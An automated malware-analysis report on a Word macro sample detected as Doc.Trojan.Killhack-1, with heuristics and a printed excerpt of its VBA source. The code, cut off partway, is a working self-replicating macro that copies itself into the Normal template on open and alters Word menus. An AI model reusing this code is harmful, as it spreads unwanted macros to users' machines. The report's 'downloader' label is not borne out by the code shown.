MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Killhack-1. It contains VBA macros, including an AutoOpen subroutine, which attempts to copy itself to the Normal template. The script also modifies the 'Help' menu, suggesting an attempt to establish persistence or provide a backdoor for further actions. The embedded URL is benign, but the overall behavior indicates a malicious macro downloader.
Heuristics (5)
- ClamAV: Doc.Trojan.Killhack-1 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Killhack-1
- VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://come.to/un2mu, in document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15884 bytes |

SHA-256: 67f099873d99bcc50a9f728d8cdfb14160d36cee6c7034e1579b13cc29d3c28c
Detection: ClamAV: Doc.Trojan.Killhack-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Kill_S129"
Dim Infected As Boolean
Dim NT, AD As Object
Sub AutoOpen()
    Dim installed As Boolean
    Dim im As Object
    Dim abt As CommandBarButton
    Dim i
    Dim oke As Boolean
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    installed = False
    For Each im In NT.VBProject.VBComponents
        If im.Name = "Kill_S129" Then installed = True
    Next
    If Not (installed) Then
        Application.OrganizerCopy Source:=AD.FullName, Destination:=NT.FullName, Name:="Kill_S129", Object:=wdOrganizerObjectProjectItems
    End If
    Search_and_Kill
    oke = False
    For Each i In CommandBars("Help").Controls
        If i.Type = msoControlButton Then If i.Caption = "About Un2mU" Then oke = True
    Next
    If Not (oke) Then
        Set abt = CommandBars("Help").Controls.Add(Type:=msoControlButton)
        abt.Caption = "About Un2mU"
        abt.OnAction = "AboutUn2mU"
        abt.Enabled = True
        abt.Visible = True
        abt.Width = 79
        abt.Height = 19
        abt.Style = msoButtonIconAndCaption
    End If
End Sub
Sub FileOpen()
    Aof
    Dialogs(wdDialogFileOpen).Show
    Search_and_Kill
    Aon
End Sub
Sub RepairMenu()
    Dim IC As CommandBarControl
    Dim damaged As Boolean
    On Error Resume Next
    damaged = False
    For Each IC In CommandBars("Help").Controls
        If IC.Caption = "Assalamu'alaikum Wr. Wb....." Then damaged = True
    Next
    If Not (damaged) Then
        For Each IC In CommandBars("Tools").Controls
            If IC.Caption = "Makmu, Cok.....!!!!" Then damaged = True
        Next
    End If
    If damaged Then
        MsgBox "Repair WORD from S129-effect", vbOKOnly, "Un2mU Virii division"
        CommandBars("Help").Controls("Assalamu'alaikum Wr. Wb.....").Caption = ("About Microsoft Word")
        CommandBars("Tools").Controls("Makmu, Cok.....!!!!").Caption = ("Macro")
        CommandBars("Tools").Controls("Tempe dan Tahu Enak...!!!").Caption = ("Templates and Add-ins...")
        CommandBars("Tools").Controls("Macro").Visible = True
        CommandBars("Tools").Controls("Macro").Enabled = True
        CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = True
    End If
    Options.VirusProtection = True
    Aon
End Sub
Sub Search_and_Kill()
    Dim im As Object
    On Error Resume Next
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    For Each im In NT.VBProject.VBComponents
        If im.Name = "S129" Or im.Name = "S129Form" Then
            MsgBox "Found & Kills virus S129 at Normal template", vbOKOnly, "Un2mU WM-AV Ver 1.3"
            Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
        ElseIf im.Name = "astia" Then
            MsgBox "Found & Kills virus Titasic at Normal template", vbOKOnly, "Un2mU WM-AV Ver 1.3"
            Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
        ElseIf im.Name = "CyberHack" Or im.Name = "CyberForm" Then
            MsgBox "Found & Kills virus CyberHack/Dwiganteng at Normal template", vbOKOnly, "Un2mU WM-AV Ver 1.3"
            Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next
    For Each im In AD.VBProject.VBComponents
        If im.Name = "S129" Or im.Name = "S129Form" Then
            MsgBox "Found & Kills virus S129 at " & AD.FullName, vbOKOnly, "Un2mU WM-AV Ver 1.3"
            Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
        ElseIf im.Name = "astia" Then
            MsgBox "Found & Kills virus Titasic at " & AD.FullName, vbOKOnly, "Un2mU WM-AV Ver 1.3"
            Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
        ElseIf im.Name = "CyberHack" Or im.Name = "CyberForm" Then
            MsgBox "Found & Kills virus CyberHack/Dwiganteng at " & AD.FullName, vbOKOnly, "Un2mU Virii division"
```

... (truncated)